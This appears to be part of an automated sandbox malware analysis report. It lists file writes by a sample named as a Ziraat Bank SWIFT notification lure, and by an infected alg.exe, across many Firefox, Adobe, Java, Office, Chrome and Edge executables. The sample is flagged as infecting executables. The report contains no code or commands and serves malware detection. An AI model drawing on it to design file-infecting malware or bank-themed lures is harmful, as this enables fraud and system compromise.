Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSACCESS.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\Locator.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7z.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	System file written: C:\Windows\System32\AppVClient.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7zG.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\SysWOW64\perfhost.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\msiexec.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lynchtmlconv.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\FXSSVC.exe
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\SensorDataService.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\msdtc.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	System file written: C:\Windows\System32\alg.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7zFM.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to behavior
